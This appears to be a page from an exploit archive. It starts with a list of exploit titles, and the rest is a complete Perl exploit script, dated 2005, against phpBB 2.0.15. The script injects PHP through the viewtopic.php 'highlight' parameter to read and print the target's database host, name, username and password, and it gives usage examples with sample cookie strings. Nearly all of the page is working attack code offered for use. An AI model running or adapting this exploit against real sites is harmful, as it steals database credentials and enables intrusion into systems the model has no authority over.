477bcbdcc0
5 new exploits phpMyNewsletter <= 0.8 (beta5) - Multiple Vulnerability Exploit phpMyNewsletter <= 0.8 (beta5) - Multiple Vulnerabilities My Book World Edition NAS Multiple Vulnerability My Book World Edition NAS - Multiple Vulnerabilities Katalog Stron Hurricane 1.3.5 - Multiple Vulnerability RFI / SQL Katalog Stron Hurricane 1.3.5 - (RFI / SQL) Multiple Vulnerabilities cmsfaethon-2.2.0-ultimate.7z Multiple Vulnerability cmsfaethon-2.2.0-ultimate.7z - Multiple Vulnerabilities DynPG CMS 4.1.0 - Multiple Vulnerability (popup.php and counter.php) DynPG CMS 4.1.0 - (popup.php and counter.php) Multiple Vulnerabilities Nucleus CMS 3.51 (DIR_LIBS) - Multiple Vulnerability Nucleus CMS 3.51 (DIR_LIBS) - Multiple Vulnerabilities N/X - Web CMS (N/X WCMS 4.5) Multiple Vulnerability N/X - Web CMS (N/X WCMS 4.5) - Multiple Vulnerabilities New-CMS - Multiple Vulnerability New-CMS - Multiple Vulnerabilities Edgephp Clickbank Affiliate Marketplace Script Multiple Vulnerability Edgephp Clickbank Affiliate Marketplace Script - Multiple Vulnerabilities JV2 Folder Gallery 3.1.1 - (popup_slideshow.php) Multiple Vulnerability JV2 Folder Gallery 3.1.1 - (popup_slideshow.php) Multiple Vulnerabilities i-Gallery - Multiple Vulnerability i-Gallery - Multiple Vulnerabilities My Kazaam Notes Management System Multiple Vulnerability My Kazaam Notes Management System - Multiple Vulnerabilities Omnidocs - Multiple Vulnerability Omnidocs - Multiple Vulnerabilities Web Cookbook Multiple Vulnerability Web Cookbook - Multiple Vulnerabilities KikChat - (LFI/RCE) Multiple Vulnerability KikChat - (LFI/RCE) Multiple Vulnerabilities Webformatique Reservation Manager - 'index.php' Cross-Site Scripting Vulnerability Webformatique Reservation Manager 2.4 - 'index.php' Cross-Site Scripting Vulnerability xEpan 1.0.4 - Multiple Vulnerability xEpan 1.0.4 - Multiple Vulnerabilities AKIPS Network Monitor 15.37 through 16.5 - OS Command Injection Netwrix Auditor 7.1.322.0 - ActiveX (sourceFile) Stack Buffer Overflow Cisco UCS Manager 2.1(1b) - Shellshock Exploit OpenSSH <= 7.2p1 - xauth Injection FreeBSD 10.2 amd64 Kernel - amd64_set_ldt Heap Overflow
135 lines
5.5 KiB
Raku
Executable file
135 lines
5.5 KiB
Raku
Executable file
#!/usr/bin/perl
|
|
|
|
# tested and working /str0ke
|
|
|
|
# ********************************************************************
|
|
# **********************************************************************
|
|
# **** **
|
|
# *** ****** ******************* **
|
|
# *** *** **** *********************** **
|
|
# *** *** **** **** * *** ***** **
|
|
# *** *** *** *** *** * ** ** ** **
|
|
# *** *** *** ** ** ** ** **
|
|
#*** *** *** *** ** ** ***** **
|
|
#** *** *** **** ** ** ** **
|
|
#** *** *** *** ******* ******* ** *** ** **
|
|
#** *** *** *** ** *** *** ** ** ** ** **
|
|
#** *** *** *** ** *** *** *** ***** **
|
|
#** *** *** *** ** *** *** **
|
|
#** **** *** **** *** *** **
|
|
#** ******* **** ******** *********************************** **
|
|
#** *** **
|
|
#** *** **
|
|
#** **
|
|
#** phpBB 2.0.15 Viewtopic.PHP Remote Code Execution Vulnerability **
|
|
#** This exploit gives the user all the details about the database **
|
|
#** connection such as database host, username, password and **
|
|
#** database name. **
|
|
#** **
|
|
#** Written by SecureD, gvr.secured<AT>gmail<DOT>com,2005 **
|
|
#** **
|
|
#** Greetings to GvR, Jumento, PP, CKrew & friends **
|
|
#** **
|
|
#*****************************************************************************
|
|
# ***************************************************************************
|
|
|
|
use IO::Socket;
|
|
|
|
print "+-----------------------------------------------------------------------+\r\n";
|
|
print "| PhpBB 2.0.15 Database Authentication Details Exploit |\r\n";
|
|
print "| By SecureD gvr.secured<AT>gmail<DOT>com |\r\n";
|
|
print "+-----------------------------------------------------------------------+\r\n";
|
|
|
|
if (@ARGV < 3)
|
|
{
|
|
print "Usage:\r\n";
|
|
print "phpbbSecureD.pl SERVER DIR THREADID COOKIESTRING\r\n\r\n";
|
|
print "SERVER - Server where PhpBB is installed.\r\n";
|
|
print "DIR - PHPBB directory or / for no directory.\r\n";
|
|
print "THREADID - Id of an existing thread.\r\n";
|
|
print "COOKIESTRING - Optional, cookie string of the http request.\r\n";
|
|
print " Use this when a thread needs authentication for viewing\r\n";
|
|
print " You can use Firefox in combination with \"Live HTTP\r\n";
|
|
print " Headers\" to get this cookiestring.\r\n\r\n";
|
|
print "Example 1 (with cookiestring):\r\n";
|
|
print "phpbbSecured.pl 192.168.168.123 /PHPBB/ 8 \"phpbb2mysql_data=a%3A2%3A%7Bs%3A11%3A%22autologinid%22%3Bs%3A0%3A%22%22%3Bs%3A6%3A%22userid%22%3Bs%3A1%3A%222%22%3B%7D; phpbb2mysql_sid=10dae92b780914332896df43808c4e09\" \r\n\r\n";
|
|
print "Example 2 (without cookiestring):\r\n";
|
|
print "phpbbSecured.pl 192.168.168.123 /PHPBB/ 20 \r\n";
|
|
exit();
|
|
}
|
|
|
|
$serv = $ARGV[0];
|
|
$dir = $ARGV[1];
|
|
$threadid = $ARGV[2];
|
|
$cookie = $ARGV[3];
|
|
|
|
$serv =~ s/http:\/\///ge;
|
|
$delimit = "GvRSecureD";
|
|
|
|
$sploit = $dir . "viewtopic.php?t=";
|
|
$sploit .= $threadid;
|
|
$sploit .= "&highlight='.printf($delimit.";
|
|
$sploit .= "\$dbhost.";
|
|
$sploit .= "$delimit.";
|
|
$sploit .= "\$dbname.";
|
|
$sploit .= "$delimit.";
|
|
$sploit .= "\$dbuser.";
|
|
$sploit .= "$delimit.";
|
|
$sploit .= "\$dbpasswd.";
|
|
$sploit .= "$delimit).'";
|
|
|
|
$sock = IO::Socket::INET->new(Proto=>"tcp", PeerAddr=>"$serv", PeerPort=>"80") or die "[+] Connecting ... Could not connect to host.\n\n";
|
|
|
|
print "[+] Connecting OK\n";
|
|
sleep(1);
|
|
|
|
print "[+] Sending exploit ";
|
|
print $sock "GET $sploit HTTP/1.1\r\n";
|
|
print $sock "Host: $serv\r\n";
|
|
if ( defined $cookie) {
|
|
print $sock "Cookie: $cookie \r\n";
|
|
}
|
|
print $sock "Connection: close\r\n\r\n";
|
|
|
|
|
|
$succes = 0;
|
|
|
|
while ($answer = <$sock>) {
|
|
$delimitIndex = index $answer, $delimit;
|
|
if ($delimitIndex >= 0) {
|
|
$succes = 1;
|
|
$urlIndex = index $answer, "href";
|
|
if ($urlIndex < 0){
|
|
$answer = substr($answer, length($delimit));
|
|
$length = 0;
|
|
while (length($answer) > 0) {
|
|
$nex = index($answer, $delimit);
|
|
if ($nex > 0) {
|
|
push(@array, substr($answer, 0, $nex));
|
|
$answer = substr($answer, $nex + length($delimit), length($answer));
|
|
} else {
|
|
$answer= "";
|
|
}
|
|
}
|
|
}
|
|
}
|
|
}
|
|
|
|
close($sock);
|
|
|
|
if ($succes == 1) {
|
|
print "OK\n";
|
|
sleep(1);
|
|
print "[+] Database Host: " . $array[0] . "\n";
|
|
sleep(1);
|
|
print "[+] Database Name: " . $array[1] . "\n";
|
|
sleep(1);
|
|
print "[+] Username: " . $array[2] . "\n";
|
|
sleep(1);
|
|
print "[+] Password: " . $array[3] . "\n";
|
|
sleep(1);
|
|
} else {
|
|
print "FAILED\n";
|
|
}
|
|
|
|
# milw0rm.com [2005-07-03]
|